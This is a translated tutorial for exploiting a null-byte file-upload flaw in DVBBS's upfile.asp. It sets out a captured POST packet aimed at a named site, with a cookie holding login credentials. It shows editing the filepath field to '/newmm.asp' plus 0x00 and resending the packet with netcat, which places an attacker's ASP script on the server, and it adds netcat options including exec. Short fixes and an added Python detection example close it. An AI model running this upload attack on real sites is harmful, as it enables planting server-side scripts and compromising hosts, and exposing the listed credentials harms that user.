1: Tools

The upload vulnerability only applies to ASP and PHP scripts that upload files through a form.

NC (Netcat): used to submit the data packet. Run the following at the DOS prompt:

nc -vv www.****.com 80 < 1.txt

-vv: echo (verbose); 80: the www port; 1.txt: the data packet you want to send. (For more usage, see the posts in this section.)

WSE (WSockExpert): monitors local ports and captures the packets IE submits.

2: Vulnerability principle

Assumptions for the example below: www host: www.****.com; BBS path: /bbs/.

The vulnerability comes from studying how files are uploaded over the Internet; some programming experience is recommended. Look at the upfile.asp file of DVBBS. You do not need to understand all of it. upfile.asp receives its upload from a form, as shown below:

<form name="form" method="post" action="upfile.asp" ...>
<input type="hidden" name="filepath" value="uploadface">
<input type="hidden" name="act" value="upload">
<input type="file" name="file1">
<input type="hidden" name="fname">
<input type="submit" name="Submit" value="upload" ...>
</form>

Variables used:
filepath: default value uploadface, attribute hidden
act: default value upload, attribute hidden
file1: the file you want to upload

The key is the filepath variable! By default our file is uploaded to www.***.com/bbs/uploadface/, and the file is named after the upload time, which is this line in upfile.asp:

filename = formpath & year(now) & month(now) & day(now) & hour(now) & minute(now) & second(now) & rannum & "." & fileext

We know that string data in the computer is terminated by a 0 (a null byte). Anyone who uses C knows this:

char data[] = "bbs"

The data array has length 4: 'b', 'b', 's', '\0'.

What if we construct filepath as follows?

filepath = "/newmm.asp" followed by a 0 byte

Then the location of the file we upload changes. Without the change: http://www.****.com/bbs/uploadface/20040924020..jpg. With our constructed filepath: http://www.****.com/newmm.asp/20040924020..jpg. When the server reads the filepath data it stops at the 0 and takes the filepath to end there. So the .asp file we upload from the local disk is saved as: http://www.***.com/newmm.asp

3: Later supplement

After the vulnerability was published, many websites patched it, but none of them filter and process filepath. Many sites, and the tools on the Internet (upfile.exe, the upload-vulnerability exploitation tool, the filepath-variable exploitation tool by "veteran"...), were only changed to add n more hidden variables; the most basic thing was not changed. There are similar vulnerabilities in website plug-ins. What I want to say is: do not rely on specialized tools. Change the filepath variable in the packet captured by WSE and submit it with NC; even if he adds n hidden variables, it does not help. Of course, if filepath is strictly filtered, our theory ends. That is when a new theory is born!

4: Detailed instance

1. Packet captured by WSE (saved to 1.txt):

POST /bbs/upphoto/upfile.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.xin126.com/bbs/upphoto/upload.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: www.xin126.com
Content-Length: 1969
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: aspsessionidaccccdcs=Beijing; iscome=1; gamvancookies=1; regtime=2004%2d9%2d24+3%3a39%3a37; username=szjwwwww; pass=5211314; dl=0; userid=62; ltstyle=0; logintry=1; userpass=eb03f6c72908fd84

-----------------------------7d423a138d0278
Content-Disposition: form-data; name="filepath"

../Medias/myphoto/
-----------------------------7d423a138d0278
......
upload
-----------------------------7d423a138d0278--

2. Open 1.txt in UltraEdit and change the data:

......
-----------------------------7d423a138d0278
Content-Disposition: form-data; name="filepath"

/newmm.asp   <= the character shown in black after "asp" is a space, 0x20. Change it to 0x00.
......

3. Recalculate the packet length (Content-Length) and submit the packet with NC:

nc -vv www.xin126.com 80 < 1.txt

UltraEdit is a hex editor that can be downloaded from the Internet. We mainly use it to write the terminator: ==> in hex: 0x00, or 00h. In fact, when you make the change you only need to add a 00 at the end of filepath.

Calculating the length ==> after you change filepath, the Content-Length has changed by plus or minus some bytes:

......
Host: www.xin126.com
Content-Length: 1969 <======
Connection: Keep-Alive
Cache-Control: no-cache
......

How to compute it? Each letter or digit counts as 1.

Solutions for the upload vulnerability (for reference only):

1. Generally the upload path is handled as a variable. ==> Our countermeasure is to turn filepath into a constant. This is currently the most effective method (I think).
2. Strengthen the processing. The server currently takes the 0 to mean it has finished reading the field; if it instead continues reading until the start of the next variable, the processing will be OK.

Appendix: NC usage

Connect to a remote host: nc [-options] hostname port[s] [ports] ...
Listen on the local host: nc -l -p port [options] [hostname] [port]

Options:
-d           detach from console, stealth mode
-e prog      inbound program to exec [dangerous!!]
-g gateway   source-routing hop point[s], up to 8
-G num       source-routing pointer: 4, 8, 12, ...
-h           this cruft
-i secs      delay interval for lines sent, ports scanned
-l           listen mode, for inbound connects
-L           listen harder, re-listen on socket close
-n           numeric-only IP addresses, no DNS
-o file      hex dump of traffic
-p port      local port number
-r           randomize local and remote ports
-s addr      local source address
-t           answer TELNET negotiation
-u           UDP mode
-v           verbose [use twice to be more verbose]
-w secs      timeout for connects and final net reads
-z           zero-I/O mode [used for scanning]

Port numbers can be individual or ranges: m-n [inclusive]
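As an added example (not code from the original article or from DVBBS), the Python below models the two fixes listed under "Solutions" and the detection of the trick used in the detailed instance: it parses a constructed multipart body modelled on the captured packet, shows what a NUL-terminated read of the filepath field sees, flags a filepath carrying a 0x00 byte or path traversal, and builds the save path from a server-side constant using the page's naming formula. The sample body, the extension allow-list and all function names are assumptions.

```python
import random
import re
from datetime import datetime

# Constructed sample body modelled on the captured packet above: the filepath
# field carries "/newmm.asp" followed by a NUL byte (0x00) and a space.
BOUNDARY = b"---------------------------7d423a138d0278"
BODY = (b"--" + BOUNDARY + b"\r\n"
        b'Content-Disposition: form-data; name="filepath"\r\n\r\n'
        b"/newmm.asp\x00 \r\n"
        b"--" + BOUNDARY + b"\r\n"
        b'Content-Disposition: form-data; name="file1"; filename="face.jpg"\r\n'
        b"Content-Type: image/jpeg\r\n\r\n"
        b"\xff\xd8\xff\xe0 constructed jpeg bytes\r\n"
        b"--" + BOUNDARY + b"--\r\n")
def parse_multipart(body, boundary):
    """Return {field name: (filename or None, raw value bytes)}; NUL bytes are kept."""
    fields = {}
    for part in body.split(b"--" + boundary)[1:]:
        if part.startswith(b"--"):                  # closing delimiter
            break
        head, _, data = part.partition(b"\r\n\r\n")
        name = re.search(rb';\s*name="([^"]*)"', head)
        fname = re.search(rb'filename="([^"]*)"', head)
        if name:
            fields[name.group(1).decode()] = (fname.group(1).decode() if fname else None,
                                              data[:-2] if data.endswith(b"\r\n") else data)
    return fields
def null_truncated(value):
    """What a C-string style read sees: everything before the first 0x00."""
    return value.split(b"\x00", 1)[0]
def filepath_is_suspicious(value):
    """Flag the two tricks the page relies on: NUL truncation and path traversal."""
    return b"\x00" in value or b".." in value or value.startswith((b"/", b"\\"))
UPLOAD_DIR = "bbs/uploadface/"   # server-side constant, not a form field (fix 1)
ALLOWED_EXT = {"jpg", "gif"}     # assumed allow-list; the page does not give one
def build_name(year, month, day, hour, minute, second, rannum, ext):
    """The page's naming formula: year & month & day & hour & minute & second & rannum."""
    return f"{year}{month}{day}{hour}{minute}{second}{rannum}.{ext}"

def safe_target(fields, now=None, rannum=None):
    """Server-chosen save path; None when the client's extension is not allowed."""
    ext = (fields["file1"][0] or "").rsplit(".", 1)[-1].lower()
    if ext not in ALLOWED_EXT:
        return None
    now = now or datetime.now()
    rannum = random.randint(1000, 9999) if rannum is None else rannum
    return UPLOAD_DIR + build_name(now.year, now.month, now.day, now.hour,
                                   now.minute, now.second, rannum, ext)
```

The client's filepath value is never used to build the target, so neither the 0x00 byte nor the "../" prefix from the captured packet can move the file out of the constant directory.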